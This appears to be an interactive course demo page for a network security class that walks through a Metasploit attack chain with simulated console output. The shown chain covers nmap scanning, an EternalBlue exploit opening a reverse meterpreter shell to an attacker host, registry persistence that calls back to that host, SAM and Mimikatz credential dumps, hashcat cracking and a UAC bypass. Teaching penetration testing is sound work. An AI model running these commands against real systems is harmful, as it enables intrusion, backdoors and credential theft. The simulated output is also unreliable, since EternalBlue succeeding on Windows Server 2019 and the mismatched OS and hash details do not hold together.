CS 423/623/723 • Network Security

🎯 Metasploit Framework

The Metasploit Framework is the world's most widely used penetration testing platform. This interactive demo illustrates the typical attack chain used in authorized security assessments.

⚠️ Educational Purposes Only

This demonstration is for educational purposes in an authorized academic setting. Unauthorized access to computer systems is illegal under the Computer Fraud and Abuse Act (CFAA) and similar laws worldwide. Always obtain written permission before conducting security assessments.

Typical Penetration Testing Scenario
🖥️
Attacker
(Kali Linux)
→→→
🌐
Network
Perimeter
→→→
🖧
Target Server
(Windows/Linux)
msfconsole — Metasploit Framework
     ,           ,
    /             \
   ((__---,,,---__))
      (_) O O (_)_________
         \ _ /            |\
          o_o \   M S F   | \
               \   _____  |  *
                |||   WW|||
                |||     |||

       =[ metasploit v6.4.0-dev ]
+ -- --=[ 2400 exploits - 1200 auxiliary - 400 post ]
+ -- --=[ 1100 payloads - 50 encoders - 10 nops ]
+ -- --=[ 9 evasion ]

msf6 > _
📚
Exploits

Pre-built attack modules targeting specific vulnerabilities in operating systems, applications, and services.

📦
Payloads

Code that runs on the target system after successful exploitation - shells, meterpreter, command execution.

🔧
Auxiliary

Scanning, fuzzing, and information gathering modules that support the exploitation process.

📮
Post-Exploitation

Modules for privilege escalation, credential harvesting, pivoting, and maintaining access.

🔍 NMAP Scanning

Network Mapper (NMAP) is the industry standard for network discovery and security auditing. It identifies live hosts, open ports, running services, and potential vulnerabilities.

nmap — Network Scanner
root@kali:~# nmap -sV -sC -O 192.168.1.100
Starting Nmap 7.94 ( https://nmap.org )
Nmap scan report for 192.168.1.100
Host is up (0.00045s latency).
Not shown: 995 closed tcp ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9
80/tcp open http Apache 2.4.38
443/tcp open ssl/http Apache 2.4.38
445/tcp open microsoft-ds Windows SMB
3389/tcp open ms-wbt-server Microsoft RDP
OS detection: Microsoft Windows Server 2019
MAC Address: 00:0C:29:XX:XX:XX (VMware)

Discovered Services

Port Service Version State Risk
22/tcp SSH OpenSSH 7.9 Open Low
80/tcp HTTP Apache 2.4.38 Open Medium
445/tcp SMB Windows SMB Open High
3389/tcp RDP MS Terminal Services Open High
🎯
-sV (Version Detection)

Probes open ports to determine service/version info. Critical for finding vulnerable versions.

📜
-sC (Script Scan)

Runs default NSE scripts for additional enumeration and vulnerability detection.

🖥️
-O (OS Detection)

Fingerprints the target OS using TCP/IP stack analysis. Helps select appropriate exploits.

💉 Exploit Delivery

Once vulnerabilities are identified, Metasploit delivers exploit code to compromise the target system. This demo shows the EternalBlue (MS17-010) SMB exploit.

msfconsole — Exploit Module
msf6 > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(ms17_010_eternalblue) > set RHOSTS 192.168.1.100
RHOSTS => 192.168.1.100
msf6 exploit(ms17_010_eternalblue) > set LHOST 192.168.1.50
LHOST => 192.168.1.50
msf6 exploit(ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 192.168.1.50:4444
[*] 192.168.1.100:445 - Connecting to target...
[*] 192.168.1.100:445 - Connection established
[*] 192.168.1.100:445 - Target OS: Windows Server 2019
[*] 192.168.1.100:445 - Sending exploit packet...
[+] 192.168.1.100:445 - ETERNALBLUE overwrite completed!
[+] 192.168.1.100:445 - Executing payload...
[*] Sending stage (200774 bytes) to 192.168.1.100
[*] Meterpreter session 1 opened (192.168.1.50:4444 -> 192.168.1.100:49158)
meterpreter > _
Exploit Delivery Flow
🖥️
Attacker
LHOST: 192.168.1.50
💉→→
📦
Exploit Payload
MS17-010
→→💥
🖧
Target (Compromised)
RHOST: 192.168.1.100
🎯
RHOSTS

Remote host(s) - the target IP address or range to attack.

📡
LHOST

Local host - the attacker's IP for reverse connections back.

🔌
LPORT

Local port - the port on attacker machine listening for shells.

💻 In-Memory Command Shell

Meterpreter is an advanced, dynamically extensible payload that operates entirely in memory, leaving minimal forensic footprint. It provides extensive post-exploitation capabilities.

meterpreter — In-Memory Shell
meterpreter > sysinfo
Computer : WIN-SERVER2019
OS : Windows Server 2019 (10.0 Build 17763)
Architecture: x64
System Lang : en_US
Domain : CORP.LOCAL
Logged Users: 2
Meterpreter : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getpid
Current pid: 1984
meterpreter > ps
PID PPID Name Arch User
--- ---- ---- ---- ----
0 0 [System] x64 NT AUTHORITY\SYSTEM
4 0 System x64 NT AUTHORITY\SYSTEM
420 4 smss.exe x64 NT AUTHORITY\SYSTEM
576 568 csrss.exe x64 NT AUTHORITY\SYSTEM
1984 576 spoolsv.exe x64 NT AUTHORITY\SYSTEM
🧠
In-Memory Execution

Meterpreter runs entirely in RAM without writing to disk, evading traditional antivirus detection and file-based forensics.

🔄
Process Migration

Can migrate to other processes for persistence and to avoid detection when the initial process terminates.

🔐
Encrypted Communication

All traffic between attacker and target is encrypted using TLS, making network detection difficult.

🧩
Extensible

Supports loading additional modules on-demand for new capabilities without touching the disk.

🚪 Backdoor Setup

Persistence mechanisms ensure continued access even after system reboots. This demonstrates various techniques attackers use to maintain their foothold.

meterpreter — Persistence Module
meterpreter > run persistence -h
Meterpreter Script for creating a persistent backdoor
OPTIONS:
-A Automatically start a matching handler
-L Location in target to write payload
-P Payload to use, default is windows/meterpreter/reverse_tcp
-S Automatically start agent on boot as service
-T Alternate executable template
-U Automatically start agent when user logs on
-X Automatically start agent when system boots
-i Interval between reconnect attempts
-p Port on remote host to connect to
-r IP of host to connect to
meterpreter > run persistence -X -i 10 -p 443 -r 192.168.1.50
[*] Running persistence module...
[*] Creating payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=443
[+] Persistent agent created: C:\Windows\Temp\payload.exe
[+] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Persistence
[+] Installed autorun key!
meterpreter > run post/windows/manage/enable_rdp
[*] Enabling Remote Desktop...
[+] RDP enabled successfully
[+] Firewall rule added for port 3389

Common Persistence Techniques

Technique Location Trigger Detection
Registry Run Keys HKLM/HKCU\...\Run User Logon Autoruns, Registry Monitoring
Scheduled Tasks Task Scheduler Time-based / Event Task Scheduler Logs
Windows Services Services.msc System Boot Service Creation Events
DLL Hijacking Application Directories App Execution Process Monitoring
WMI Subscriptions WMI Repository Event-based WMI Activity Logging
🛡️ Defense: Detecting Persistence

Security teams use tools like Sysinternals Autoruns, EDR solutions, and SIEM correlation to detect unauthorized persistence mechanisms. Regular baseline comparisons and anomaly detection are key defensive strategies.

🔐 Password Dumps

Credential harvesting extracts password hashes and tokens from memory and system files. These can be used for lateral movement or offline cracking.

meterpreter — Credential Harvesting
meterpreter > hashdump
[+] Obtaining hashes from SAM database...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
jsmith:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
svcaccount:1002:aad3b435b51404eeaad3b435b51404ee:e52cac67419a9a224a3b108f3fa6cb6d:::
meterpreter > load kiwi
[+] Loading kiwi extension (Mimikatz)...
[+] Extension loaded successfully!
meterpreter > creds_all
[+] Running as SYSTEM, extracting credentials...
msv credentials
===============
Username Domain NTLM SHA1
-------- ------ ---- ----
jsmith CORP 64f12cddaa88057e06a81b54e73b949b a4f4...
admin CORP e52cac67419a9a224a3b108f3fa6cb6d b2e3...
wdigest credentials
===================
Username Domain Password
-------- ------ --------
jsmith CORP Summer2024!
admin CORP Corp@dm1n#2024
🗃️
SAM Database

Security Account Manager stores local user password hashes. Requires SYSTEM privileges to dump.

🔑
LSASS Memory

Local Security Authority Subsystem Service stores credentials of logged-in users in memory.

🎫
Kerberos Tickets

TGT and service tickets can be extracted for pass-the-ticket attacks in Active Directory.

📋
Cached Credentials

Domain cached credentials (DCC2) stored locally for offline domain authentication.

⚡ Password Cracking

Offline password cracking uses various techniques to recover plaintext passwords from captured hashes. Modern GPUs can test billions of combinations per second.

hashcat — Password Recovery
root@kali:~# hashcat -m 1000 -a 0 hashes.txt rockyou.txt
hashcat v6.2.6 starting...
OpenCL API (OpenCL 3.0) - Platform #1 [NVIDIA]
* Device #1: NVIDIA GeForce RTX 4090, 24256/24564 MB
Minimum password length: 0
Maximum password length: 256
Dictionary cache loaded:
* Filename..: rockyou.txt
* Passwords.: 14,344,391
64f12cddaa88057e06a81b54e73b949b:Summer2024!
e52cac67419a9a224a3b108f3fa6cb6d:Corp@dm1n#2024
a4f4b55112db58aadd1d8e4e2e2e5b14:Password123!
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1000 (NTLM)
Hash.Target......: hashes.txt
Time.Started.....: Thu Feb 5 10:30:45 2026
Time.Estimated...: Thu Feb 5 10:30:47 2026
Speed.#1.........: 98.45 GH/s (2.5ms)
Recovered........: 3/4 (75.00%) Digests

3 of 4 hashes cracked (75%)

Attack Modes Comparison

Mode Hashcat Flag Speed Coverage Best For
Dictionary -a 0 Very Fast Limited Common passwords
Brute Force -a 3 Slow Complete Short passwords
Rule-Based -a 0 -r Fast Good Password variations
Combinator -a 1 Medium Medium Word combinations
Hybrid -a 6/7 Medium Good Dict + mask patterns
📖
John the Ripper

Classic password cracker supporting many hash types. Good for initial quick cracks with auto-detection.

🎮
Hashcat

World's fastest password cracker. GPU-accelerated, supports 300+ hash types and advanced rules.

👑 Privilege Escalation

Privilege escalation exploits misconfigurations or vulnerabilities to elevate from a standard user to administrator or SYSTEM level access.

meterpreter — Privilege Escalation
meterpreter > getuid
Server username: CORP\jsmith
meterpreter > run post/multi/recon/local_exploit_suggester
[*] 192.168.1.100 - Collecting local exploits...
[*] 192.168.1.100 - 44 exploit checks being attempted...
[+] exploit/windows/local/bypassuac_eventvwr
Target appears vulnerable (UAC is Enabled)
[+] exploit/windows/local/ms16_032_secondary_logon_handle_privesc
Target appears vulnerable
[+] exploit/windows/local/cve_2021_1732_win32k
Target appears vulnerable (Windows 10 20H2)
meterpreter > background
[*] Backgrounding session 1...
msf6 > use exploit/windows/local/bypassuac_eventvwr
msf6 exploit(bypassuac_eventvwr) > set SESSION 1
msf6 exploit(bypassuac_eventvwr) > exploit
[*] Started reverse TCP handler on 192.168.1.50:4444
[*] UAC is Enabled, checking bypass method...
[*] Executing payload via Event Viewer...
[+] Meterpreter session 2 opened (192.168.1.50:4444 -> 192.168.1.100:49159)
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getsystem
[+] ...got system via technique 1 (Named Pipe Impersonation)

Common Privilege Escalation Vectors

🛡️
UAC Bypass

Exploits auto-elevation features in Windows to run code with elevated privileges without triggering UAC prompts.

🎭
Token Impersonation

Steals or duplicates access tokens from other processes to assume their privileges (SeImpersonatePrivilege).

⚙️
Service Misconfigurations

Unquoted service paths, weak permissions, or writable service binaries allow code execution as SYSTEM.

📝
Kernel Exploits

Vulnerabilities in the Windows kernel or drivers provide direct path to SYSTEM privileges.

🛡️ Defense: Preventing Privilege Escalation

Organizations should: Apply security patches promptly, enforce least privilege, use Credential Guard, enable LAPS for local admin passwords, audit service configurations, and deploy EDR solutions with privilege escalation detection.